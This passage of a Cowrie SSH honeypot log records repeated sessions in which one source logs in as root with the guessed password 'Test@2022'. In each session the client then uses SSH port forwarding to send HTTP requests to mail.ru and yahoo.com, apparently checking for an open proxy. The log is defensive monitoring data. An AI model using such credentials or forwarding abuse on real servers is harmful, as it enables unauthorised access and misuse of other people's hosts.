nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:43:39.371430Z","src_ip":"77.83.207.83","session":"4114ec2e03d1"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:43:39.626968Z","src_ip":"77.83.207.83","session":"4114ec2e03d1"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":1477,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:1477","sensor":"my-vps","timestamp":"2025-08-31T03:43:39.678948Z","session":"4114ec2e03d1"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:39.730213Z","src_ip":"77.83.207.83","session":"4114ec2e03d1"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"77.83.207.83","src_port":706,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:706","sensor":"my-vps","timestamp":"2025-08-31T03:43:39.873622Z","session":"4114ec2e03d1"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:39.925077Z","src_ip":"77.83.207.83","session":"4114ec2e03d1"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"77.83.207.83","src_port":1569,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:1569","sensor":"my-vps","timestamp":"2025-08-31T03:43:40.069695Z","session":"4114ec2e03d1"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:40.121111Z","src_ip":"77.83.207.83","session":"4114ec2e03d1"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:43:40.173247Z","src_ip":"77.83.207.83","session":"4114ec2e03d1"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":35809,"dst_ip":"1.2.3.4","dst_port":22,"session":"cc54c5e78fd4","protocol":"ssh","message":"New connection: 77.83.207.83:35809 (1.2.3.4:22) [session: cc54c5e78fd4]","sensor":"my-vps","timestamp":"2025-08-31T03:43:40.221738Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:43:40.222850Z","src_ip":"77.83.207.83","session":"cc54c5e78fd4"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:43:40.272629Z","src_ip":"77.83.207.83","session":"cc54c5e78fd4"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:43:40.519750Z","src_ip":"77.83.207.83","session":"cc54c5e78fd4"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":17233,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:17233","sensor":"my-vps","timestamp":"2025-08-31T03:43:40.570137Z","session":"cc54c5e78fd4"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:40.619855Z","src_ip":"77.83.207.83","session":"cc54c5e78fd4"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":28723,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:28723","sensor":"my-vps","timestamp":"2025-08-31T03:43:40.759952Z","session":"cc54c5e78fd4"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:40.809493Z","src_ip":"77.83.207.83","session":"cc54c5e78fd4"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"77.83.207.83","src_port":12338,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:12338","sensor":"my-vps","timestamp":"2025-08-31T03:43:40.952089Z","session":"cc54c5e78fd4"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:41.001923Z","src_ip":"77.83.207.83","session":"cc54c5e78fd4"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:43:41.052720Z","src_ip":"77.83.207.83","session":"cc54c5e78fd4"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":35881,"dst_ip":"1.2.3.4","dst_port":22,"session":"7eca66856c00","protocol":"ssh","message":"New connection: 77.83.207.83:35881 (1.2.3.4:22) [session: 7eca66856c00]","sensor":"my-vps","timestamp":"2025-08-31T03:43:41.101747Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:43:41.111551Z","src_ip":"77.83.207.83","session":"7eca66856c00"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:43:41.152243Z","src_ip":"77.83.207.83","session":"7eca66856c00"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:43:41.399682Z","src_ip":"77.83.207.83","session":"7eca66856c00"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":5465,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:5465","sensor":"my-vps","timestamp":"2025-08-31T03:43:41.450255Z","session":"7eca66856c00"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:41.500485Z","src_ip":"77.83.207.83","session":"7eca66856c00"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":20184,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:20184","sensor":"my-vps","timestamp":"2025-08-31T03:43:41.644145Z","session":"7eca66856c00"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:41.694636Z","src_ip":"77.83.207.83","session":"7eca66856c00"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"77.83.207.83","src_port":6348,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:6348","sensor":"my-vps","timestamp":"2025-08-31T03:43:41.836062Z","session":"7eca66856c00"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eff265ce3fe88cc50aec4fb21ef2fa5564c880aafa6cd111cad97c6281d0b410","size":28,"shasum":"eff265ce3fe88cc50aec4fb21ef2fa5564c880aafa6cd111cad97c6281d0b410","duplicate":true,"duration":"6.1","message":"Closing TTY Log: var/lib/cowrie/tty/eff265ce3fe88cc50aec4fb21ef2fa5564c880aafa6cd111cad97c6281d0b410 after 6.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:43:41.838958Z","src_ip":"212.227.125.160","session":"68d333c1aaf0"}
{"eventid":"cowrie.session.closed","duration":"17.6","message":"Connection lost after 17.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:43:41.839972Z","src_ip":"212.227.125.160","session":"68d333c1aaf0"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:41.885826Z","src_ip":"77.83.207.83","session":"7eca66856c00"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:43:41.936399Z","src_ip":"77.83.207.83","session":"7eca66856c00"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":35961,"dst_ip":"1.2.3.4","dst_port":22,"session":"7cd72b2ecb59","protocol":"ssh","message":"New connection: 77.83.207.83:35961 (1.2.3.4:22) [session: 7cd72b2ecb59]","sensor":"my-vps","timestamp":"2025-08-31T03:43:41.984938Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:43:41.986247Z","src_ip":"77.83.207.83","session":"7cd72b2ecb59"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:43:42.035873Z","src_ip":"77.83.207.83","session":"7cd72b2ecb59"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:43:42.283543Z","src_ip":"77.83.207.83","session":"7cd72b2ecb59"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":24402,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:24402","sensor":"my-vps","timestamp":"2025-08-31T03:43:42.333941Z","session":"7cd72b2ecb59"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:42.383561Z","src_ip":"77.83.207.83","session":"7cd72b2ecb59"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":22317,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:22317","sensor":"my-vps","timestamp":"2025-08-31T03:43:42.524034Z","session":"7cd72b2ecb59"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:42.573654Z","src_ip":"77.83.207.83","session":"7cd72b2ecb59"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"77.83.207.83","src_port":8318,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:8318","sensor":"my-vps","timestamp":"2025-08-31T03:43:42.716096Z","session":"7cd72b2ecb59"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:42.765751Z","src_ip":"77.83.207.83","session":"7cd72b2ecb59"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:43:42.816448Z","src_ip":"77.83.207.83","session":"7cd72b2ecb59"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":36042,"dst_ip":"1.2.3.4","dst_port":22,"session":"6dd6e23a3e1a","protocol":"ssh","message":"New connection: 77.83.207.83:36042 (1.2.3.4:22) [session: 6dd6e23a3e1a]","sensor":"my-vps","timestamp":"2025-08-31T03:43:42.868324Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:43:42.869069Z","src_ip":"77.83.207.83","session":"6dd6e23a3e1a"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:43:42.921546Z","src_ip":"77.83.207.83","session":"6dd6e23a3e1a"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:43:43.182807Z","src_ip":"77.83.207.83","session":"6dd6e23a3e1a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":27745,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:27745","sensor":"my-vps","timestamp":"2025-08-31T03:43:43.236623Z","session":"6dd6e23a3e1a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:43.289088Z","src_ip":"77.83.207.83","session":"6dd6e23a3e1a"}
{"eventid":"cowrie.session.connect","src_ip":"201.148.180.50","src_port":60426,"dst_ip":"1.2.3.4","dst_port":22,"session":"756991504bd9","protocol":"ssh","message":"New connection: 201.148.180.50:60426 (1.2.3.4:22) [session: 756991504bd9]","sensor":"my-vps","timestamp":"2025-08-31T03:43:43.394521Z"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"77.83.207.83","src_port":9337,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:9337","sensor":"my-vps","timestamp":"2025-08-31T03:43:43.434717Z","session":"6dd6e23a3e1a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:43.487163Z","src_ip":"77.83.207.83","session":"6dd6e23a3e1a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"77.83.207.83","src_port":19359,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:19359","sensor":"my-vps","timestamp":"2025-08-31T03:43:43.634798Z","session":"6dd6e23a3e1a"}
